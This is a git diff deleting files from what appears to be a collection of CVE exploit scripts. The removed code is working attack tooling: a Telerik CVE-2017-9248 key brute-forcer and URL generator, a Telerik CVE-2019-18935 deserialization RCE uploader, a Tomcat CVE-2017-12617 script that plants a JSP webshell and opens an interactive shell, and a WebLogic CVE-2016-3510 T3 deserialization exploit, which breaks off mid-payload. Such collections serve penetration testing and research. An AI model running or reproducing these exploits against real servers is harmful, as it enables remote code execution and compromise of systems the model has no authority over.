-            else '- all ASCII -'
-        ) +
-        "]\n"
-    )
-    for i in range(int(key_length)):
-        pos_str = (
-            str(i + 1)
-            if i > 8
-            else "0" + str(i + 1)
-        )
-        sys.stdout.write("Key position " + pos_str + ": (------")
-        sys.stdout.flush()
-        keychar = test_keypos(key_charset, unprintable, found, session)
-        if keychar is not False:
-            found = found + keychar
-            sys.stdout.write(
-                          "\b"*7 + "{" +
-                          (
-                              keychar
-                              if unprintable is False
-                              else '0x' + binascii.hexlify(keychar.encode()).decode()
-                          ) +
-                          "} found with " +
-                          str(char_requests) +
-                          " requests, total so far: " +
-                          str(requests_sent) +
-                          "\n"
-                      )
-            sys.stdout.flush()
-            char_requests = 0
-        else:
-            sys.stdout.write("\b"*7 + "Not found, quitting\n")
-            sys.stdout.flush()
-            break
-    if keychar is not False:
-        print("Found key: " +
-              (
-                found
-                if unprintable is False
-                else "(hex) " + binascii.hexlify(found.encode()).decode()
-              )
-              )
-    print("Total web requests: " + str(requests_sent))
-    return found
-
-
-def mode_brutekey():
-    session = requests.Session()
-    found = get_key(session)
-
-    if found == '':
-        return
-    else:
-        urls = {}
-        url_path = args.url
-        params = (
-                    '?DialogName=DocumentManager' +
-                    '&renderMode=2' +
-                    '&Skin=Default' +
-                    '&Title=Document%20Manager' +
-                    '&dpptn=' +
-                    '&isRtl=false' +
-                    '&dp='
-                  )
-        versions = [
-                    '2007.1423', '2007.1521', '2007.1626', '2007.2918',
-                    '2007.21010', '2007.21107', '2007.31218', '2007.31314',
-                    '2007.31425', '2008.1415', '2008.1515', '2008.1619',
-                    '2008.2723', '2008.2826', '2008.21001', '2008.31105',
-                    '2008.31125', '2008.31314', '2009.1311', '2009.1402',
-                    '2009.1527', '2009.2701', '2009.2826', '2009.31103',
-                    '2009.31208', '2009.31314', '2010.1309', '2010.1415',
-                    '2010.1519', '2010.2713', '2010.2826', '2010.2929',
-                    '2010.31109', '2010.31215', '2010.31317', '2011.1315',
-                    '2011.1413', '2011.1519', '2011.2712', '2011.2915',
-                    '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
-                    '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
-                    '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
-                    '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
-                    '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
-                    '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
-                    '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
-                    '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
-                    '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
-                    '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
-                    '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
-                    '2017.3.913'
-                    ]
-
-        plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
-        plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
-        plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
-        plaintext3 = ';AllowMultipleSelection,False,3,False'
-
-        if len(args.version) > 0:
-            versions = [args.version]
-
-        for version in versions:
-            plaintext2_raw2 = version
-            plaintext2 = base64.b64encode(
-                            (plaintext2_raw1 +
-                                plaintext2_raw2 +
-                                plaintext2_raw3
-                             ).encode()
-                        ).decode()
-            plaintext = plaintext1 + plaintext2 + plaintext3
-            plaintext = base64.b64encode(
-                            plaintext.encode()
-                        ).decode()
-            ciphertext = base64.b64encode(
-                            encrypt(
-                                plaintext,
-                                found
-                            ).encode()
-                        ).decode()
-            full_url = url_path + params + ciphertext
-            urls[version] = full_url
-
-        found_valid_version = False
-        for version in urls:
-            url = urls[version]
-            request = requests.Request('GET', url)
-            request = request.prepare()
-            response = session.send(request, verify=False, proxies=getProxy(args.proxy))
-            if response.status_code == 500:
-                continue
-            else:
-                match = re.search(
-                    "(Error Message:)(.+\n*.+)(</div>)",
-                    response.text
-                    )
-                if match is None:
-                    print(version + ": " + url)
-                    found_valid_version = True
-                    break
-
-        if not found_valid_version:
-            print("No valid version found")
-
-def mode_samples():
-    print("Samples for testing decryption and encryption functions:")
-    print("-d ciphertext key")
-    print("-e plaintext key")
-    print("")
-    print("Key:")
-    print("DC50EEF37087D124578FD4E205EFACBE0D9C56607ADF522D")
-    print("")
-    print("Plaintext:")
-    print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False")
-    print("")
-    print("Ciphertext:")
-    print("FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+")
-    print("")
-
-
-def mode_b64e():
-    print(base64.b64encode(args.parameter.encode()).decode())
-    print("")
-
-
-def mode_b64d():
-    print(base64.b64decode(args.parameter.encode()).decode())
-    print("")
-
-sys.stderr.write(
-              "\ndp_crypto by Paul Taylor / @bao7uo\nCVE-2017-9248 - " +
-              "Telerik.Web.UI.dll Cryptographic compromise\n\n"
-            )
-
-p = argparse.ArgumentParser()
-subparsers = p.add_subparsers()
-
-decrypt_parser = subparsers.add_parser('d', help='Decrypt a ciphertext')
-decrypt_parser.set_defaults(func=mode_decrypt)
-decrypt_parser.add_argument('ciphertext', action='store', type=str, default='', help='Ciphertext to decrypt')
-decrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
-
-encrypt_parser = subparsers.add_parser('e', help='Encrypt a plaintext')
-encrypt_parser.set_defaults(func=mode_encrypt)
-encrypt_parser.add_argument('plaintext', action='store', type=str, default='', help='Ciphertext to decrypt')
-encrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
-
-brute_parser = subparsers.add_parser('k', help='Bruteforce key/generate URL')
-brute_parser.set_defaults(func=mode_brutekey)
-brute_parser.add_argument('-u', '--url', action='store', type=str, help='Target URL')
-brute_parser.add_argument('-l', '--key-len', action='store', type=int, default=48, help='Len of the key to retrieve, OPTIONAL: default is 48')
-brute_parser.add_argument('-o', '--oracle', action='store', type=str, default='Index was outside the bounds of the array.', help='The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message')
-brute_parser.add_argument('-v', '--version', action='store', type=str, default='', help='OPTIONAL. Specify the version to use rather than iterating over all of them')
-brute_parser.add_argument('-c', '--charset', action='store', type=str, default='hex', help='Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex')
-brute_parser.add_argument('-a', '--accuracy', action='store', type=int, default=9, help='Maximum accuracy is out of 64 where 64 is the most accurate, \
-    accuracy of 9 will usually suffice for a hex, but 21 or more might be needed when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.')
-brute_parser.add_argument('-p', '--proxy', action='store', type=str, default='', help='Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080')
-
-encode_parser = subparsers.add_parser('b', help='Encode parameter to base64')
-encode_parser.set_defaults(func=mode_b64e)
-encode_parser.add_argument('parameter', action='store', type=str, help='Parameter to encode')
-
-decode_parser = subparsers.add_parser('p', help='Decode base64 parameter')
-decode_parser.set_defaults(func=mode_b64d)
-decode_parser.add_argument('parameter', action='store', type=str, help='Parameter to decode')
-
-args = p.parse_args()
-
-if len(sys.argv) > 2:
-    args.func()
diff --git a/CVE Exploits/Telerik CVE-2019-18935.py b/CVE Exploits/Telerik CVE-2019-18935.py
deleted file mode 100644
index b255351..0000000
--- a/CVE Exploits/Telerik CVE-2019-18935.py	
+++ /dev/null
@@ -1,140 +0,0 @@
-#!/usr/bin/env python3
-# origin : https://github.com/noperator/CVE-2019-18935
-# INSTALL: 
-# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
-#  python3 -m venv env
-#  source env/bin/activate
-#  pip3 install -r requirements.txt
-
-# Import encryption routines.
-from sys import path
-path.insert(1, 'RAU_crypto')
-from RAU_crypto import RAUCipher
-
-from argparse import ArgumentParser
-from json import dumps, loads
-from os.path import basename, splitext
-from pprint import pprint
-from requests import post
-from requests.packages.urllib3 import disable_warnings
-from sys import stderr
-from time import time
-from urllib3.exceptions import InsecureRequestWarning
-
-disable_warnings(category=InsecureRequestWarning)
-
-def send_request(files):
-    headers = {
-        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
-        'Connection': 'close',
-        'Accept-Language': 'en-US,en;q=0.5',
-        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-        'Upgrade-Insecure-Requests': '1'
-    }
-    response = post(url, files=files, verify=False, headers=headers)
-    try:
-        result = loads(response.text)
-        result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
-        pprint(result)
-    except:
-        print(response.text)
-
-def build_raupostdata(object, type):
-    return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
-
-def upload():
-
-    # Build rauPostData.
-    object = {
-        'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
-        'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
-        'MaxFileSize': 0,
-        'TimeToLive': {  # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
-            'Ticks': 1440000000000,
-            'Days': 0,
-            'Hours': 40,
-            'Minutes': 0,
-            'Seconds': 0,
-            'Milliseconds': 0,
-            'TotalDays': 1.6666666666666666,
-            'TotalHours': 40,
-            'TotalMinutes': 2400,
-            'TotalSeconds': 144000,
-            'TotalMilliseconds': 144000000
-        },
-        'UseApplicationPoolImpersonation': False
-    }
-    type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
-    raupostdata = build_raupostdata(object, type)
-    
-    with open(filename_local, 'rb') as f:
-        payload = f.read()
-    
-    metadata = {
-        'TotalChunks': 1,
-        'ChunkIndex': 0,
-        'TotalFileSize': 1,
-        'UploadID': filename_remote  # Determines remote filename on disk.
-    }
-    
-    # Build multipart form data.
-    files = {
-        'rauPostData': (None, raupostdata),
-        'file': (filename_remote, payload, 'application/octet-stream'),
-        'fileName': (None, filename_remote),
-        'contentType': (None, 'application/octet-stream'),
-        'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
-        'metadata': (None, dumps(metadata))
-    }
-    
-    # Send request.
-    print('[*] Local payload name: ', filename_local, file=stderr)
-    print('[*] Destination folder: ', temp_target_folder, file=stderr)
-    print('[*] Remote payload name:', filename_remote, file=stderr)
-    print(file=stderr)
-    send_request(files)
-
-def deserialize():
-
-    # Build rauPostData.
-    object = {
-        'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
-    }
-    type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
-    raupostdata = build_raupostdata(object, type)
-    
-    # Build multipart form data.
-    files = {
-        'rauPostData': (None, raupostdata),  # Only need this now.
-        '': ''  # One extra input is required for the page to process the request.
-    }
-    
-    # Send request.
-    print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
-    start = time()
-    send_request(files)
-    end = time()
-    print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
-
-if __name__ == '__main__':
-    parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
-    parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
-    parser.add_argument('-v', dest='ui_version', required=True, help='software version')
-    parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
-    parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
-    parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
-    parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
-    args = parser.parse_args()
-
-    temp_target_folder = args.folder.replace('/', '\\')
-    ui_version = args.ui_version
-    net_version = args.net_version
-    filename_local = args.payload
-    filename_remote = str(time()) + splitext(basename(filename_local))[1]
-    url = args.url
-
-    upload()
-
-    if not args.test_upload:
-        deserialize()
-
diff --git a/CVE Exploits/Tomcat CVE-2017-12617.py b/CVE Exploits/Tomcat CVE-2017-12617.py
deleted file mode 100644
index 4b72ffb..0000000
--- a/CVE Exploits/Tomcat CVE-2017-12617.py	
+++ /dev/null
@@ -1,239 +0,0 @@
-#!/usr/bin/python
-# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
-"""
-./cve-2017-12617.py [options]
-
-
-options:
-
-
--u ,--url [::] check target url if it's vulnerable
--p,--pwn [::] generate webshell and upload it
--l,--list [::] hosts list
-
-
-[+]usage:
-
-
-./cve-2017-12617.py -u http://127.0.0.1
-./cve-2017-12617.py --url http://127.0.0.1
-./cve-2017-12617.py -u http://127.0.0.1 -p pwn
-./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
-./cve-2017-12617.py -l hotsts.txt
-./cve-2017-12617.py --list hosts.txt
-"""
-from __future__ import print_function
-from builtins import input
-from builtins import str
-from builtins import object
-import requests
-import re
-import signal
-from optparse import OptionParser
-
-
-
-
-
-
-
-
-class bcolors(object):
-    HEADER = '\033[95m'
-    OKBLUE = '\033[94m'
-    OKGREEN = '\033[92m'
-    WARNING = '\033[93m'
-    FAIL = '\033[91m'
-    ENDC = '\033[0m'
-    BOLD = '\033[1m'
-    UNDERLINE = '\033[4m'
-
-
-
-
-banner="""
-
-
-   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
-  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
- | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
- | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
- | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
-  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/
-
-
-
-[@intx0x80]
-
-"""
-
-
-
-
-
-def signal_handler(signal, frame):
-
-    print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
-
-    exit()
-
-signal.signal(signal.SIGINT, signal_handler)
-
-
-
-
-def removetags(tags):
-    remove = re.compile('<.*?>')
-    txt = re.sub(remove, '\n', tags)
-    return txt.replace("\n\n\n","\n")
-
-
-def getContent(url,f):
-    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-    re=requests.get(str(url)+"/"+str(f), headers=headers)
-    return re.content
-
-def createPayload(url,f):
-    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
-    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
-    if req.status_code==201:
-        print("File Created ..")
-
-
-def RCE(url,f):
-    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
-    <INPUT name='cmd' type=text>
-    <INPUT type=submit value='Run'>
-    </FORM>
-    <%@ page import="java.io.*" %>
-    <%
-   String cmd = request.getParameter("cmd");
-   String output = "";
-   if(cmd != null) {
-      String s = null;
-      try {
-         Process p = Runtime.getRuntime().exec(cmd,null,null);
-         BufferedReader sI = new BufferedReader(new
-InputStreamReader(p.getInputStream()));
-         while((s = sI.readLine()) != null) { output += s+"</br>"; }
-      }  catch(IOException e) {   e.printStackTrace();   }
-   }
-%>
-<pre><%=output %></pre>"""
-
-
-
-    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-
-    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
-
-
-
-def shell(url,f):
-
-    while True:
-        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-        cmd=input("$ ")
-        payload={'cmd':cmd}
-        if cmd=="q" or cmd=="Q":
-            break
-
-        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
-        re=str(re.content)
-        t=removetags(re)
-        print(t)
-
-
-
-
-
-#print bcolors.HEADER+ banner+bcolors.ENDC
-
-parse=OptionParser(
-
-
-bcolors.HEADER+"""
-
-
-   _______      ________    ___   ___  __ ______     __ ___   __ __ ______
-  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
- | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /
- | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /
- | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /
-  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/
-
-
-
-
-./cve-2017-12617.py [options]
-
-options:
-
--u ,--url [::] check target url if it's vulnerable
--p,--pwn  [::] generate webshell and upload it
--l,--list [::] hosts list
-
-[+]usage:
-
-./cve-2017-12617.py -u http://127.0.0.1
-./cve-2017-12617.py --url http://127.0.0.1
-./cve-2017-12617.py -u http://127.0.0.1 -p pwn
-./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
-./cve-2017-12617.py -l hotsts.txt
-./cve-2017-12617.py --list hosts.txt
-
-
-[@intx0x80]
-
-"""+bcolors.ENDC
-
-    )
-
-
-parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
-parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
-parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
-
-(opt,args)=parse.parse_args()
-
-if opt.U==None and opt.P==None and opt.L==None:
-    print(parse.usage)
-    exit(0)
-
-
-
-else:
-    if opt.U!=None and opt.P==None and opt.L==None:
-        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-        url=str(opt.U)
-        checker="Poc.jsp"
-        print(bcolors.BOLD +"Poc Filename  {}".format(checker))
-        createPayload(str(url)+"/",checker)
-        con=getContent(str(url)+"/",checker)
-        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-            print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
-            print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
-
-        else:
-            print('Not Vulnerable to CVE-2017-12617 ')
-    elif opt.P!=None and opt.U!=None and  opt.L==None:
-        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-        pwn=str(opt.P)
-        url=str(opt.U)
-        print("Uploading Webshell .....")
-        pwn=pwn+".jsp"
-        RCE(str(url)+"/",pwn)
-        shell(str(url),pwn)
-    elif opt.L!=None and opt.P==None and opt.U==None:
-        print(bcolors.OKGREEN+banner+bcolors.ENDC)
-        w=str(opt.L)
-        f=open(w,"r")
-        print("Scaning hosts in {}".format(w))
-        checker="Poc.jsp"
-        for i in f.readlines():
-            i=i.strip("\n")
-            createPayload(str(i)+"/",checker)
-            con=getContent(str(i)+"/",checker)
-            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
-                print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
diff --git a/CVE Exploits/WebLogic CVE-2016-3510.py b/CVE Exploits/WebLogic CVE-2016-3510.py
deleted file mode 100644
index 706e0b1..0000000
--- a/CVE Exploits/WebLogic CVE-2016-3510.py	
+++ /dev/null
@@ -1,72 +0,0 @@
-#!/usr/bin/env python2
-
-#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
-#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
-#Made with <3 by @byt3bl33d3r
-
-from __future__ import print_function
-import socket
-import struct
-import argparse
-import os
-import sys
-from subprocess import check_output
-
-ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
-ysoserial_path = None
-
-parser = argparse.ArgumentParser()
-parser.add_argument('target', type=str, help='Target IP:PORT')
-parser.add_argument('command', type=str, help='Command to run on target')
-parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
-
-if len(sys.argv) < 2:
-    parser.print_help()
-    sys.exit(1)
-
-args = parser.parse_args()
-
-if not args.ysoserial_path:
-    for path in ysoserial_default_paths:
-        if os.path.exists(path):
-            ysoserial_path = path
-else:
-    if os.path.exists(args.ysoserial_path):
-        ysoserial_path = args.ysoserial_path
-
-if len(args.target.split(':')) != 2:
-    print('[-] Target must be in format IP:PORT')
-    sys.exit(1)
-
-if not args.command:
-    print('[-] You must specify a command to run')
-    sys.exit(1)
-
-ip, port = args.target.split(':')
-
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-print('[*] Target IP: {}'.format(ip))
-print('[*] Target PORT: {}'.format(port))
-
-sock.connect((ip, int(port)))
-
-# Send headers
-headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
-print('[*] Sending header')
-sock.sendall(headers)
-
-data = sock.recv(1024)
-print('[*] Received: "{}"'.format(data))
-
-payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
-
-payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
-payload += payloadObj
-payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x